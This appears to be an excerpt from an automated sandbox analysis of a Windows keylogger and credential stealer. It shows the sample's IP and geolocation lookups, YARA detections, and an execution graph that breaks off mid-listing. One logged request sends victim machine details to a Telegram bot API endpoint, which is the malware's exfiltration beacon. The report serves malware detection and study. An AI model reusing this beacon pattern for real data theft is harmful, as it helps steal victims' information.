5 | 192.168.2.7 | 49710 | 158.101.44.242 | 80 | 6764 | C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 10:47:36.616889000 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Sep 27, 2024 10:47:37.193453074 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 08:47:37 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 5b813e63282ee73a0fdbd6b0d39da9a2
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49712 | 158.101.44.242 | 80 | 6764 | C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 10:47:37.823101044 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Sep 27, 2024 10:47:38.380419970 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 08:47:38 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 9e6604b2fca0fcb362a16ee5e59c0638
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 49714 | 158.101.44.242 | 80 | 6764 | C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 10:47:38.988795996 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Sep 27, 2024 10:47:39.775293112 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 08:47:39 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 53be6181c7b8e9caca29ee76df1fe8f0
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 27, 2024 10:47:39.787242889 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 08:47:39 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 53be6181c7b8e9caca29ee76df1fe8f0
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49700 | 188.114.97.3 | 443 | 6764 | C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 08:47:30 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-09-27 08:47:30 UTC | 681 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 08:47:30 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 1406
Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a9KUx%2BuAhvwQA3MDpV9GYEv%2BxQL7WAqmTMLkYeGJ3fmW5BspXRbBG9hQqX%2B8WYqkMxS%2BdgkufmQCeOclrSLpI5W0hL8j%2BbSwBVdPzbkjdUs8I%2Ba9banRz2VtNYeCcqNNrBZI6Abs"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c9a3ab918137ce2-EWR
2024-09-27 08:47:30 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-27 08:47:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49701 | 188.114.97.3 | 443 | 6764 | C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 08:47:31 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
2024-09-27 08:47:31 UTC | 685 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 08:47:31 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 1407
Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HC6pQYsrj2s8efM%2FnQKwK4l%2BnTLIAiRKGGf%2FhXxkiCCv%2FLBUGjZ8BxBxNqyL1NJTLEitxKV5QqzDITYbk8zQmkr8eCSmQSezzwhPrtbqVVP0%2FIYYMN%2Bwf2l%2BBOleiD2vJ%2FIqJqc9"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c9a3abf488e8cda-EWR
2024-09-27 08:47:31 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-27 08:47:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49703 | 188.114.97.3 | 443 | 6764 | C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 08:47:32 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
    Host: reallyfreegeoip.org
2024-09-27 08:47:32 UTC | 681 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 08:47:32 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 1408
    Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QGOJl%2Bb0B2HP5uX7cXRoAVFFqBUffNEMb0FcjdcaYf4g3xOnE%2B2L9bUp01pYonQWfLEXzIINVSsVF7UgPd9H13i%2FRmn%2F87YJTxlcO0IVc1Iij0KJap%2B57kYH6w7pw7vGVmu%2Fo0Ub"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9a3ac6bcf618fa-EWR
2024-09-27 08:47:32 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-27 08:47:32 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49705 | 188.114.97.3 | 443 | 6764 | C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 08:47:34 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
    Host: reallyfreegeoip.org
2024-09-27 08:47:34 UTC | 681 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 08:47:34 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 1410
    Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vjYL2n8LIR1iJFO9XFo%2FbLuJi8jJDTDHC6Vt3JYYWQbMlwf2Z7%2FvE2yXUHAGfYZTiQkMuZlPatIL6H9tc%2F6nHDZya44xTl3b%2B%2Bat3AX0erRH%2FOKiIA4UHzWqksRZzGdU0C3aPzyV"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9a3ace3af04375-EWR
2024-09-27 08:47:34 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-27 08:47:34 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49707 | 188.114.97.3 | 443 | 6764 | C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 08:47:35 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-09-27 08:47:35 UTC | 675 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 08:47:35 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 1411
    Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=el%2FGsP215r4KPBvlIK939yUVlbCmN1A%2FRror4BGLqrjthyIHJTqiRwJ8bFbasWcNgEGxhPkvdquOSoQfXWnyEb4HuRSmjM%2Fk260Urj3iJklrxdMdGcms5qLvDSVlSN1jI0oYH1Mh"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9a3ad5e8cb43e9-EWR
2024-09-27 08:47:35 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-27 08:47:35 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49709 | 188.114.97.3 | 443 | 6764 | C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 08:47:36 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-09-27 08:47:36 UTC | 675 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 08:47:36 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 1412
    Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gfz0o%2BqggiWvSrwtdb2GxvhJ0d6kuSccCVM3XYkrS7fREm%2F0CZWCPJ0io14UO%2Fl0mkQ24HRKjevBXTLaC0bmz4zwHdTO9ozJG8tZMd9RYcijbmG3TJodhA4gQc0bzaOUruq24LJx"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9a3add6e0b0c84-EWR
2024-09-27 08:47:36 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-27 08:47:36 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49711 | 188.114.97.3 | 443 | 6764 | C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 08:47:37 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-09-27 08:47:37 UTC | 671 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 08:47:37 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 1413
    Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Nz2AP8nxY0cDOHS8wDUXG0IkCOyDNHHD49ZtWjBzPGuv3pMx1ANi2s4Bl01nEoY5zaNwsteEE6NQTABhTD8tnMZ6zFJvDSppF6BRwlDthG57704ecMqxDFLHLC8JBivcvIuS6%2BT"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9a3ae4ef6d8c84-EWR
2024-09-27 08:47:37 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-27 08:47:37 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 49713 | 188.114.97.3 | 443 | 6764 | C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 08:47:38 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
    Host: reallyfreegeoip.org
2024-09-27 08:47:38 UTC | 675 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 08:47:38 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 1414
    Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PPmkMBAVymc3%2BgInpZTi5oDEKaCoPZ3ihplQWHNkHz0QwyCACV%2BoGdPjInxxlMsRjnHtIeZX%2F74WPrDyeRq0NwQefKgLRJY7uUPyzIIl6pn67NY1uHymzrZ2OzcwItzGB60cAPyJ"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9a3aec3d65c477-EWR
2024-09-27 08:47:38 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-27 08:47:38 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.7 | 49715 | 188.114.97.3 | 443 | 6764 | C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 08:47:40 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-09-27 08:47:40 UTC | 671 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 08:47:40 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 1416
    Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WAH1x9VBcGUM%2FcrKC64XDVOGK7eR2MhGHsoidl4jGiZiVecBrl1mlxNofBiZkUSjEJNFl0j0h0x6ObkkiDk3mtbAcvbZOEoMoGYfER9tyn0tVZ0fPHnJPrq7YYKz0KM8Nn5pAbd0"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9a3af50d0e0ccd-EWR
2024-09-27 08:47:40 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-27 08:47:40 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.7 | 49716 | 149.154.167.220 | 443 | 6764 | C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 08:47:41 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20and%20Time:%2027/09/2024%20/%2015:33:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20642294%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
2024-09-27 08:47:41 UTC | 344 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Date: Fri, 27 Sep 2024 08:47:41 GMT
    Content-Type: application/json
    Content-Length: 55
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 08:47:41 UTC | 55 | IN | Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}



Target ID: 0
Start time: 04:47:27
Start date: 27/09/2024
Path: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe"
Imagebase: 0x700000
File size: 279'040 bytes
MD5 hash: B046211FE3F420A9CEB7663A560ECE96
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1233370033.0000000000702000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000000.1233370033.0000000000702000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.1233370033.0000000000702000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000000.1233370033.0000000000702000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1510453566.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:12
                                                                                  Start time:04:47:41
                                                                                  Start date:27/09/2024
                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6764 -s 2620
                                                                                  Imagebase:0x720000
                                                                                  File size:483'680 bytes
                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true


                                                                                    Execution Graph

                                                                                    Execution Coverage:18.6%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:71.4%
                                                                                    Total number of Nodes:28
                                                                                    Total number of Limit Nodes:2
                                                                                    execution_graph 19421 ece018 19422 ece024 19421->19422 19429 6701970 19422->19429 19434 6701962 19422->19434 19423 ece0c3 19439 670e950 19423->19439 19443 670e942 19423->19443 19424 ece110 19430 6701992 19429->19430 19431 6701a5e 19430->19431 19447 6708688 19430->19447 19451 6708a6c 19430->19451 19431->19423 19435 6701970 19434->19435 19436 6701a5e 19435->19436 19437 6708688 LdrInitializeThunk 19435->19437 19438 6708a6c LdrInitializeThunk 19435->19438 19436->19423 19437->19436 19438->19436 19440 670e972 19439->19440 19441 6708688 LdrInitializeThunk 19440->19441 19442 670ea3c 19440->19442 19441->19442 19442->19424 19444 670e950 19443->19444 19445 6708688 LdrInitializeThunk 19444->19445 19446 670ea3c 19444->19446 19445->19446 19446->19424 19449 67086b9 19447->19449 19448 6708819 19448->19431 19449->19448 19450 6708ba9 LdrInitializeThunk 19449->19450 19450->19448 19453 6708923 19451->19453 19452 6708ba9 LdrInitializeThunk 19454 6708bc1 19452->19454 19453->19452 19454->19431

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 146 ec29e0-ec2a3b 150 ec2a5d-ec2aac 146->150 151 ec2a3d-ec2a5c 146->151 155 ec2aae-ec2ab5 150->155 156 ec2ac7-ec2acf 150->156 157 ec2abe-ec2ac5 155->157 158 ec2ab7-ec2abc 155->158 159 ec2ad2-ec2ae6 156->159 157->159 158->159 162 ec2afc-ec2b04 159->162 163 ec2ae8-ec2aef 159->163 166 ec2b06-ec2b0a 162->166 164 ec2af5-ec2afa 163->164 165 ec2af1-ec2af3 163->165 164->166 165->166 168 ec2b0c-ec2b21 166->168 169 ec2b6a-ec2b6d 166->169 168->169 177 ec2b23-ec2b26 168->177 170 ec2b6f-ec2b84 169->170 171 ec2bb5-ec2bbb 169->171 170->171 181 ec2b86-ec2b8a 170->181 172 ec36b6 171->172 173 ec2bc1-ec2bc3 171->173 178 ec36bb-ec3c65 172->178 173->172 175 ec2bc9-ec2bce 173->175 179 ec3664-ec3668 175->179 180 ec2bd4 175->180 182 ec2b28-ec2b2a 177->182 183 ec2b45-ec2b63 call ec02c8 177->183 200 ec3c69-ec3ca4 178->200 185 ec366f-ec36b5 179->185 186 ec366a-ec366d 179->186 180->179 187 ec2b8c-ec2b90 181->187 188 ec2b92-ec2bb0 call ec02c8 181->188 182->183 189 ec2b2c-ec2b2f 182->189 183->169 186->178 186->185 187->171 187->188 188->171 189->169 193 ec2b31-ec2b43 189->193 193->169 193->183 200->200 202 ec3ca6-ec3cd9 200->202 206 